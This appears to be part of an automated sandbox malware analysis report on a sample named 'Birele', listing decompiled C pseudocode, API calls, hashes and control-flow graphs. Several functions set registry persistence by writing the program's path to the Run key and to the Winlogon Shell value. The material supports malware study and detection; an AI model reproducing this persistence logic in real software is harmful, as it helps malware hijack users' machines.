                                                                                                          0x00415513

                                                                                                          APIs
                                                                                                          • RegEnumKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00415514,?,00000000,0041555D), ref: 004154C6
                                                                                                          • RegCloseKey.ADVAPI32(00000000,0041551B,00000000,0041555D), ref: 0041550E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseEnum
                                                                                                          • String ID:
                                                                                                          • API String ID: 2818636725-0
                                                                                                          • Opcode ID: d6dec6ad87b9bb48edb1b6286cbdb4c5307ef8eea5445d6588dc9f7194a8fb47
                                                                                                          • Instruction ID: 53bd9e7c38770a469da39ef08191287436f21e819fe24a67677f5adb3dce5017
                                                                                                          • Opcode Fuzzy Hash: d6dec6ad87b9bb48edb1b6286cbdb4c5307ef8eea5445d6588dc9f7194a8fb47
                                                                                                          • Instruction Fuzzy Hash: 41413270E00608EFDB00EFA5D982BDEB7B9EB88314F504576B414F7291D6389E458B58
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 617 401624-401668 618 4016a6-4016ac 617->618 619 40166a-401674 618->619 620 4016ae-4016b5 618->620 621 401676 619->621 622 401678-40167c 619->622 621->622 623 401682-401684 622->623 624 40167e 622->624 625 4016a4 623->625 626 401686-401698 VirtualAlloc 623->626 624->623 625->618 626->625 627 40169a-4016a2 626->627 627->620
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00401624(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                                                          				signed int _v20;
                                                                                                          				void** _v24;
                                                                                                          				void* _t15;
                                                                                                          				void** _t16;
                                                                                                          				void* _t17;
                                                                                                          				signed int _t27;
                                                                                                          				intOrPtr* _t29;
                                                                                                          				void* _t31;
                                                                                                          				intOrPtr* _t32;
                                                                                                          
                                                                                                          				_v24 = __ecx;
                                                                                                          				 *_t32 = __edx;
                                                                                                          				_t31 = __eax & 0xfffff000;
                                                                                                          				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                                                          				 *_v24 = _t31;
                                                                                                          				_t15 = _v20 - _t31;
                                                                                                          				_v24[1] = _t15;
                                                                                                          				_t29 =  *0x4195e4; // 0x612a5c
                                                                                                          				while(_t29 != 0x4195e4) {
                                                                                                          					_t17 =  *(_t29 + 8);
                                                                                                          					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                                                                                                          					if(_t31 > _t17) {
                                                                                                          						_t17 = _t31;
                                                                                                          					}
                                                                                                          					if(_t27 > _v20) {
                                                                                                          						_t27 = _v20;
                                                                                                          					}
                                                                                                          					if(_t27 > _t17) {
                                                                                                          						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                                                                          						if(_t15 == 0) {
                                                                                                          							_t16 = _v24;
                                                                                                          							 *_t16 = 0;
                                                                                                          							return _t16;
                                                                                                          						}
                                                                                                          					}
                                                                                                          					_t29 =  *_t29;
                                                                                                          				}
                                                                                                          				return _t15;
                                                                                                          			}












                                                                                                          0x0040162b
                                                                                                          0x0040162f
                                                                                                          0x00401636
                                                                                                          0x0040164b
                                                                                                          0x00401653
                                                                                                          0x00401659
                                                                                                          0x0040165f
                                                                                                          0x00401662
                                                                                                          0x004016a6
                                                                                                          0x0040166a
                                                                                                          0x00401670
                                                                                                          0x00401674
                                                                                                          0x00401676
                                                                                                          0x00401676
                                                                                                          0x0040167c
                                                                                                          0x0040167e
                                                                                                          0x0040167e
                                                                                                          0x00401684
                                                                                                          0x00401691
                                                                                                          0x00401698
                                                                                                          0x0040169a
                                                                                                          0x004016a0
                                                                                                          0x00000000
                                                                                                          0x004016a0
                                                                                                          0x00401698
                                                                                                          0x004016a4
                                                                                                          0x004016a4
                                                                                                          0x004016b5

                                                                                                          APIs
                                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401691
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID: L*a$\*a
                                                                                                          • API String ID: 4275171209-59427461
                                                                                                          • Opcode ID: f756fe2b4bf2f4490c772e984fe826dfacce7d8b813dad50ef75eca238e20777
                                                                                                          • Instruction ID: ec70c602bd4316e153522ad771d77975271b5875b60273cfc83a9ee7ef7296fa
                                                                                                          • Opcode Fuzzy Hash: f756fe2b4bf2f4490c772e984fe826dfacce7d8b813dad50ef75eca238e20777
                                                                                                          • Instruction Fuzzy Hash: 23117072A046019FC3109F29CD80A5BBBE5EFC4750F19CA3EE598A73A4D636AC508A49
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 628 401490-40149d 629 4014a6-4014ac 628->629 630 40149f-4014a4 628->630 631 4014b2-4014ca VirtualAlloc 629->631 630->631 632 4014cc-4014da call 401344 631->632 633 4014ef-4014f2 631->633 632->633 636 4014dc-4014ed VirtualFree 632->636 636->633
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00401490(void* __eax, void** __edx) {
                                                                                                          				void* _t3;
                                                                                                          				void** _t8;
                                                                                                          				void* _t11;
                                                                                                          				long _t14;
                                                                                                          
                                                                                                          				_t8 = __edx;
                                                                                                          				if(__eax >= 0x100000) {
                                                                                                          					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                                                                          				} else {
                                                                                                          					_t14 = 0x100000;
                                                                                                          				}
                                                                                                          				_t8[1] = _t14;
                                                                                                          				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                                                          				_t11 = _t3;
                                                                                                          				 *_t8 = _t11;
                                                                                                          				if(_t11 != 0) {
                                                                                                          					_t3 = E00401344(0x4195e4, _t8);
                                                                                                          					if(_t3 == 0) {
                                                                                                          						VirtualFree( *_t8, 0, 0x8000);
                                                                                                          						 *_t8 = 0;
                                                                                                          						return 0;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t3;
                                                                                                          			}







                                                                                                          0x00401493
                                                                                                          0x0040149d
                                                                                                          0x004014ac
                                                                                                          0x0040149f
                                                                                                          0x0040149f
                                                                                                          0x0040149f
                                                                                                          0x004014b2
                                                                                                          0x004014bf
                                                                                                          0x004014c4
                                                                                                          0x004014c6
                                                                                                          0x004014ca
                                                                                                          0x004014d3
                                                                                                          0x004014da
                                                                                                          0x004014e6
                                                                                                          0x004014ed
                                                                                                          0x00000000
                                                                                                          0x004014ed
                                                                                                          0x004014da
                                                                                                          0x004014f2

                                                                                                          APIs
                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401799), ref: 004014BF
                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401799), ref: 004014E6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual$AllocFree
                                                                                                          • String ID: \*a
                                                                                                          • API String ID: 2087232378-3476656928
                                                                                                          • Opcode ID: 77a77d2dc0625b1740870d9dfa2a73a5d66441a28a53282cd84120034db7bed6
                                                                                                          • Instruction ID: 79218588031a4a26cda0ae1425ca10e2fb9ad1666caba1eb793414810d07ccbf
                                                                                                          • Opcode Fuzzy Hash: 77a77d2dc0625b1740870d9dfa2a73a5d66441a28a53282cd84120034db7bed6
                                                                                                          • Instruction Fuzzy Hash: 22F0AE72B0062017D72059AA4DC1F5365D59F45750F154177FA08FF3E9D6794C054299
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00407AC4(void* __eax) {
                                                                                                          				short _v32;
                                                                                                          				signed int _t10;
                                                                                                          				MSG* _t12;
                                                                                                          				void* _t15;
                                                                                                          				struct tagMSG* _t19;
                                                                                                          				void* _t21;
                                                                                                          				MSG* _t22;
                                                                                                          
                                                                                                          				_t15 = __eax;
                                                                                                          				_t22 = _t21 + 0xffffffe0;
                                                                                                          				_t19 = _t22;
                                                                                                          				_t10 = PeekMessageA(_t19, 0, 0, 0, 1); // executed
                                                                                                          				if(_t10 != 0) {
                                                                                                          					if(_v32 != 0x12) {
                                                                                                          						_t10 =  *((intOrPtr*)( *((intOrPtr*)(_t15 + 0x80))))();
                                                                                                          						if(_t10 == 0) {
                                                                                                          							_t12 = _t22;
                                                                                                          							TranslateMessage(_t12); // executed
                                                                                                          							_t10 = DispatchMessageA(_t12); // executed
                                                                                                          						}
                                                                                                          					} else {
                                                                                                          						 *0x4198a5 =  *0x4198a5 | _t19;
                                                                                                          					}
                                                                                                          					_t10 = _t10 & 0xffffff00 | _v32 != 0x00000000;
                                                                                                          				}
                                                                                                          				return _t10;
                                                                                                          			}










                                                                                                          0x00407ac5
                                                                                                          0x00407ac6
                                                                                                          0x00407ac9
                                                                                                          0x00407ad3
                                                                                                          0x00407ada
                                                                                                          0x00407ae2
                                                                                                          0x00407af5
                                                                                                          0x00407af9
                                                                                                          0x00407afb
                                                                                                          0x00407aff
                                                                                                          0x00407b04
                                                                                                          0x00407b04
                                                                                                          0x00407ae4
                                                                                                          0x00407ae4
                                                                                                          0x00407ae4
                                                                                                          0x00407b0f
                                                                                                          0x00407b0f
                                                                                                          0x00407b16

                                                                                                          APIs
                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00407AD3
                                                                                                          • TranslateMessage.USER32 ref: 00407AFF
                                                                                                          • DispatchMessageA.USER32 ref: 00407B04
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$DispatchPeekTranslate
                                                                                                          • String ID:
                                                                                                          • API String ID: 4217535847-0
                                                                                                          • Opcode ID: b72a001ec0696afd76b19a0160fe4a25a6d2607575ec95731367a802bc4ac773
                                                                                                          • Instruction ID: 04cd691bd0688bce4aa5f4e87f49b084e83cc56aed8ace428e2a74bf0d5574d3
                                                                                                          • Opcode Fuzzy Hash: b72a001ec0696afd76b19a0160fe4a25a6d2607575ec95731367a802bc4ac773
                                                                                                          • Instruction Fuzzy Hash: E5E0E450B0410156DF1557558C47A7F315CDB41368F14803EF4049B1C2DABDBC45B1B7
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 51%
                                                                                                          			E00416BE8(void* __ebx, void* __esi, void* __eflags) {
                                                                                                          				char _v8;
                                                                                                          				char _v12;
                                                                                                          				intOrPtr _t40;
                                                                                                          				intOrPtr _t45;
                                                                                                          
                                                                                                          				_push(0);
                                                                                                          				_push(0);
                                                                                                          				_push(_t45);
                                                                                                          				_push(0x416c7f);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t45;
                                                                                                          				 *0x419b10 = E004150EC(1);
                                                                                                          				E0041518C( *0x419b10, 0x80000001);
                                                                                                          				E004152D0( *0x419b10, 0x419b10, 1, "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", __esi); // executed
                                                                                                          				E00406040(0,  &_v12);
                                                                                                          				E00403BA4( &_v8, E00403E38(_v12));
                                                                                                          				E0041566C( *0x419b10, _v8, "system");
                                                                                                          				E0041515C( *0x419b10);
                                                                                                          				E00402EF8( *0x419b10);
                                                                                                          				_pop(_t40);
                                                                                                          				 *[fs:eax] = _t40;
                                                                                                          				_push(E00416C86);
                                                                                                          				return E004039D0( &_v12, 2);
                                                                                                          			}







                                                                                                          0x00416beb
                                                                                                          0x00416bed
                                                                                                          0x00416bf7
                                                                                                          0x00416bf8
                                                                                                          0x00416bfd
                                                                                                          0x00416c00
                                                                                                          0x00416c0f
                                                                                                          0x00416c18
                                                                                                          0x00416c26
                                                                                                          0x00416c30
                                                                                                          0x00416c42
                                                                                                          0x00416c51
                                                                                                          0x00416c58
                                                                                                          0x00416c5f
                                                                                                          0x00416c66
                                                                                                          0x00416c69
                                                                                                          0x00416c6c
                                                                                                          0x00416c7e

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$FileModuleNameOpen
                                                                                                          • String ID: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run$dPA$system
                                                                                                          • API String ID: 3807207300-3666762942
                                                                                                          • Opcode ID: c662102a57e3b0d022a4dca426026b12c36e29274dd09739ab254e7fd81c7bdb
                                                                                                          • Instruction ID: 83b14a0d54c4074618b4fad308d97d1f78c8e4f92c33b452bb90d3c22a2f1eb1
                                                                                                          • Opcode Fuzzy Hash: c662102a57e3b0d022a4dca426026b12c36e29274dd09739ab254e7fd81c7bdb
                                                                                                          • Instruction Fuzzy Hash: D3019230700500ABD700EF6AC892BCD77E8EB8A308F614476F4009B395D67DBD44878D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 51%
                                                                                                          			E00416CD4(void* __ebx, void* __esi, void* __eflags) {
                                                                                                          				char _v8;
                                                                                                          				char _v12;
                                                                                                          				intOrPtr _t40;
                                                                                                          				intOrPtr _t45;
                                                                                                          
                                                                                                          				_push(0);
                                                                                                          				_push(0);
                                                                                                          				_push(_t45);
                                                                                                          				_push(0x416d6b);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t45;
                                                                                                          				 *0x419b10 = E004150EC(1);
                                                                                                          				E0041518C( *0x419b10, 0x80000001);
                                                                                                          				E004152D0( *0x419b10, 0x419b10, 1, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", __esi); // executed
                                                                                                          				E00406040(0,  &_v12);
                                                                                                          				E00403BA4( &_v8, E00403E38(_v12));
                                                                                                          				E0041566C( *0x419b10, _v8, 0x416dc0);
                                                                                                          				E0041515C( *0x419b10);
                                                                                                          				E00402EF8( *0x419b10);
                                                                                                          				_pop(_t40);
                                                                                                          				 *[fs:eax] = _t40;
                                                                                                          				_push(E00416D72);
                                                                                                          				return E004039D0( &_v12, 2);
                                                                                                          			}







                                                                                                          0x00416cd7
                                                                                                          0x00416cd9
                                                                                                          0x00416ce3
                                                                                                          0x00416ce4
                                                                                                          0x00416ce9
                                                                                                          0x00416cec
                                                                                                          0x00416cfb
                                                                                                          0x00416d04
                                                                                                          0x00416d12
                                                                                                          0x00416d1c
                                                                                                          0x00416d2e
                                                                                                          0x00416d3d
                                                                                                          0x00416d44
                                                                                                          0x00416d4b
                                                                                                          0x00416d52
                                                                                                          0x00416d55
                                                                                                          0x00416d58
                                                                                                          0x00416d6a

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$FileModuleNameOpen
                                                                                                          • String ID: Shell$\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$dPA
                                                                                                          • API String ID: 3807207300-2870672713
                                                                                                          • Opcode ID: 15aa72c9726bfa40507e8934dbca8e692a976af2498af1528ce6daeb54ffe17e
                                                                                                          • Instruction ID: c0636251eb1413816d7780e85c4fd4ec95d181644a148eecd2aa2730e43b21ed
                                                                                                          • Opcode Fuzzy Hash: 15aa72c9726bfa40507e8934dbca8e692a976af2498af1528ce6daeb54ffe17e
                                                                                                          • Instruction Fuzzy Hash: AE018030700504ABD700EF69D892BCD77E8EB8A308F61447AF4009B395DA79AD45878D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 84%
                                                                                                          			E004155F4(void* __eax, char* __ecx, void* __edx, void* __eflags) {
                                                                                                          				long _t14;
                                                                                                          				signed int _t18;
                                                                                                          				void* _t26;
                                                                                                          				char* _t27;
                                                                                                          				intOrPtr* _t28;
                                                                                                          
                                                                                                          				_push(__ecx);
                                                                                                          				_t27 = __ecx;
                                                                                                          				_t26 = __eax;
                                                                                                          				E004028F0(__ecx, 8);
                                                                                                          				_t1 = _t27 + 4; // 0x415658
                                                                                                          				_t14 = RegQueryValueExA( *(_t26 + 4), E00403E38(__edx), 0, _t28 + 8, 0, _t1); // executed
                                                                                                          				 *_t27 = E004150C4( *_t28);
                                                                                                          				return _t18 & 0xffffff00 | _t14 == 0x00000000;
                                                                                                          			}








                                                                                                          0x004155f8
                                                                                                          0x004155f9
                                                                                                          0x004155fd
                                                                                                          0x00415608
                                                                                                          0x0041560d
                                                                                                          0x00415626
                                                                                                          0x00415638
                                                                                                          0x00415642

                                                                                                          APIs
                                                                                                          • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,XVA,?,?,?,?,?,00415658), ref: 00415626
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue
                                                                                                          • String ID: XVA
                                                                                                          • API String ID: 3660427363-1892953550
                                                                                                          • Opcode ID: bdad61842de96a8ecfa6f7134ed25dccd154f6d51978f6cc7bc1d28d143b7bb5
                                                                                                          • Instruction ID: 0be95d8bbee23d3a5970da2aada55c85b1e09da36afbaebcbe77afcb5e364633
                                                                                                          • Opcode Fuzzy Hash: bdad61842de96a8ecfa6f7134ed25dccd154f6d51978f6cc7bc1d28d143b7bb5
                                                                                                          • Instruction Fuzzy Hash: 3DF0A07330A2046BE710EAAE9C41FAB6BDCDB88355F00813EF50CC7281CA25CC0883B4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 69%
                                                                                                          			E00415AC0(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                          				void* _v8;
                                                                                                          				intOrPtr _v12;
                                                                                                          				int _v16;
                                                                                                          				int _v20;
                                                                                                          				char _v24;
                                                                                                          				intOrPtr _v28;
                                                                                                          				intOrPtr _v32;
                                                                                                          				intOrPtr _v36;
                                                                                                          				void* _v40;
                                                                                                          				char _v44;
                                                                                                          				intOrPtr _v68;
                                                                                                          				char _v72;
                                                                                                          				char _v76;
                                                                                                          				char _v80;
                                                                                                          				char _v84;
                                                                                                          				void* _t86;
                                                                                                          				long _t95;
                                                                                                          				intOrPtr _t102;
                                                                                                          				void* _t124;
                                                                                                          				long _t134;
                                                                                                          				void* _t135;
                                                                                                          				intOrPtr _t148;
                                                                                                          				intOrPtr _t160;
                                                                                                          				void* _t161;
                                                                                                          				void* _t162;
                                                                                                          				void* _t164;
                                                                                                          				void* _t165;
                                                                                                          				intOrPtr _t166;
                                                                                                          
                                                                                                          				_t162 = __esi;
                                                                                                          				_t161 = __edi;
                                                                                                          				_t135 = __ebx;
                                                                                                          				_t164 = _t165;
                                                                                                          				_t166 = _t165 + 0xffffffb0;
                                                                                                          				_v84 = 0;
                                                                                                          				_v80 = 0;
                                                                                                          				_v76 = 0;
                                                                                                          				_v24 = 0;
                                                                                                          				_v12 = __edx;
                                                                                                          				_v8 = __eax;
                                                                                                          				_push(_t164);
                                                                                                          				_push(0x415d01);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t166;
                                                                                                          				_v28 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 4));
                                                                                                          				E004151F0( *((intOrPtr*)(_a4 - 4)), _v8);
                                                                                                          				_push(_t164);
                                                                                                          				_push(0x415cd7);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t166;
                                                                                                          				if(E0041558C( *((intOrPtr*)(_a4 - 4)),  &_v72, __eflags) == 0) {
                                                                                                          					L8:
                                                                                                          					__eflags = 0;
                                                                                                          					_pop(_t148);
                                                                                                          					 *[fs:eax] = _t148;
                                                                                                          					_push(E00415CDE);
                                                                                                          					return E004151F0( *((intOrPtr*)(_a4 - 4)), _v28);
                                                                                                          				} else {
                                                                                                          					E00403A9C( &_v24, _v68 + 1, 0);
                                                                                                          					_t86 = _v72 - 1;
                                                                                                          					if(_t86 >= 0) {
                                                                                                          						_v44 = _t86 + 1;
                                                                                                          						_v20 = 0;
                                                                                                          						do {
                                                                                                          							_v16 = _v68 + 1;
                                                                                                          							_t95 = RegEnumKeyExA(_v8, _v20, E00403E38(_v24),  &_v16, 0, 0, 0, 0); // executed
                                                                                                          							if(_t95 != 0) {
                                                                                                          								goto L7;
                                                                                                          							} else {
                                                                                                          								E00403BA4( &_v76, E00403E38(_v24));
                                                                                                          								_t102 = E00415774( *((intOrPtr*)(_a4 - 4)), _t135, _v76, _t162); // executed
                                                                                                          								_v36 = _t102;
                                                                                                          								_t172 = _v36;
                                                                                                          								if(_v36 == 0) {
                                                                                                          									goto L7;
                                                                                                          								} else {
                                                                                                          									_push(_t164);
                                                                                                          									_push(0x415ca8);
                                                                                                          									_push( *[fs:eax]);
                                                                                                          									 *[fs:eax] = _t166;
                                                                                                          									_v32 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 4));
                                                                                                          									E004151F0( *((intOrPtr*)(_a4 - 4)), _v12);
                                                                                                          									_push(_t164);
                                                                                                          									_push(0x415c8a);
                                                                                                          									_push( *[fs:eax]);
                                                                                                          									 *[fs:eax] = _t166;
                                                                                                          									E00403BA4( &_v80, E00403E38(_v24));
                                                                                                          									E004151F4( *((intOrPtr*)(_a4 - 4)), _t135, _v80, _t161, _t162); // executed
                                                                                                          									E00403BA4( &_v84, E00403E38(_v24));
                                                                                                          									_t124 = E00415774( *((intOrPtr*)(_a4 - 4)), _t135, _v84, _t162); // executed
                                                                                                          									_v40 = _t124;
                                                                                                          									_push(_t164);
                                                                                                          									_push(0x415c67);
                                                                                                          									_push( *[fs:eax]);
                                                                                                          									 *[fs:eax] = _t166;
                                                                                                          									E00415998(_v36, _t135, _v40, _t161, _t162, _t172, _a4); // executed
                                                                                                          									E00415AC0(_v36, _t135, _v40, _t161, _t162, _t172, _a4); // executed
                                                                                                          									_pop(_t160);
                                                                                                          									 *[fs:eax] = _t160;
                                                                                                          									_push(E00415C6E);
                                                                                                          									_t134 = RegCloseKey(_v40); // executed
                                                                                                          									return _t134;
                                                                                                          								}
                                                                                                          							}
                                                                                                          							goto L10;
                                                                                                          							L7:
                                                                                                          							_v20 = _v20 + 1;
                                                                                                          							_t62 =  &_v44;
                                                                                                          							 *_t62 = _v44 - 1;
                                                                                                          							__eflags =  *_t62;
                                                                                                          						} while ( *_t62 != 0);
                                                                                                          					}
                                                                                                          					goto L8;
                                                                                                          				}
                                                                                                          				L10:
                                                                                                          			}































                                                                                                          0x00415ac0
                                                                                                          0x00415ac0
                                                                                                          0x00415ac0
                                                                                                          0x00415ac1
                                                                                                          0x00415ac3
                                                                                                          0x00415ac8
                                                                                                          0x00415acb
                                                                                                          0x00415ace
                                                                                                          0x00415ad1
                                                                                                          0x00415ad4
                                                                                                          0x00415ad7
                                                                                                          0x00415adc
                                                                                                          0x00415add
                                                                                                          0x00415ae2
                                                                                                          0x00415ae5
                                                                                                          0x00415af1
                                                                                                          0x00415afd
                                                                                                          0x00415b04
                                                                                                          0x00415b05
                                                                                                          0x00415b0a
                                                                                                          0x00415b0d
                                                                                                          0x00415b20
                                                                                                          0x00415cbb
                                                                                                          0x00415cbb
                                                                                                          0x00415cbd
                                                                                                          0x00415cc0
                                                                                                          0x00415cc3
                                                                                                          0x00415cd6
                                                                                                          0x00415b26
                                                                                                          0x00415b2f
                                                                                                          0x00415b37
                                                                                                          0x00415b3a
                                                                                                          0x00415b41
                                                                                                          0x00415b44
                                                                                                          0x00415b4b
                                                                                                          0x00415b4f
                                                                                                          0x00415b6f
                                                                                                          0x00415b76
                                                                                                          0x00000000
                                                                                                          0x00415b7c
                                                                                                          0x00415b89
                                                                                                          0x00415b97
                                                                                                          0x00415b9c
                                                                                                          0x00415b9f
                                                                                                          0x00415ba3
                                                                                                          0x00000000
                                                                                                          0x00415ba9
                                                                                                          0x00415bab
                                                                                                          0x00415bac
                                                                                                          0x00415bb1
                                                                                                          0x00415bb4
                                                                                                          0x00415bc0
                                                                                                          0x00415bcc
                                                                                                          0x00415bd3
                                                                                                          0x00415bd4
                                                                                                          0x00415bd9
                                                                                                          0x00415bdc
                                                                                                          0x00415bec
                                                                                                          0x00415bfa
                                                                                                          0x00415c0c
                                                                                                          0x00415c1a
                                                                                                          0x00415c1f
                                                                                                          0x00415c24
                                                                                                          0x00415c25
                                                                                                          0x00415c2a
                                                                                                          0x00415c2d
                                                                                                          0x00415c3a
                                                                                                          0x00415c4a
                                                                                                          0x00415c52
                                                                                                          0x00415c55
                                                                                                          0x00415c58
                                                                                                          0x00415c61
                                                                                                          0x00415c66
                                                                                                          0x00415c66
                                                                                                          0x00415ba3
                                                                                                          0x00000000
                                                                                                          0x00415caf
                                                                                                          0x00415caf
                                                                                                          0x00415cb2
                                                                                                          0x00415cb2
                                                                                                          0x00415cb2
                                                                                                          0x00415cb2
                                                                                                          0x00415b4b
                                                                                                          0x00000000
                                                                                                          0x00415b3a
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                            • Part of subcall function 0041558C: RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,?,?,0041548A,00000000), ref: 004155C3
                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00415CD7,?,00000000,00415D01), ref: 00415B6F
                                                                                                            • Part of subcall function 00415774: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,004157FA), ref: 004157DF
                                                                                                            • Part of subcall function 004151F4: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004152C0), ref: 0041526B
                                                                                                            • Part of subcall function 004151F4: RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004152C0), ref: 0041527F
                                                                                                            • Part of subcall function 00415998: RegEnumValueA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00415A8A,?,00000000,00415AAF), ref: 00415A3D
                                                                                                            • Part of subcall function 00415AC0: RegCloseKey.ADVAPI32(?,00415C6E,00000000,00415C8A,?,00000000,00415CA8,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00415C61
                                                                                                          Memory Dump Source
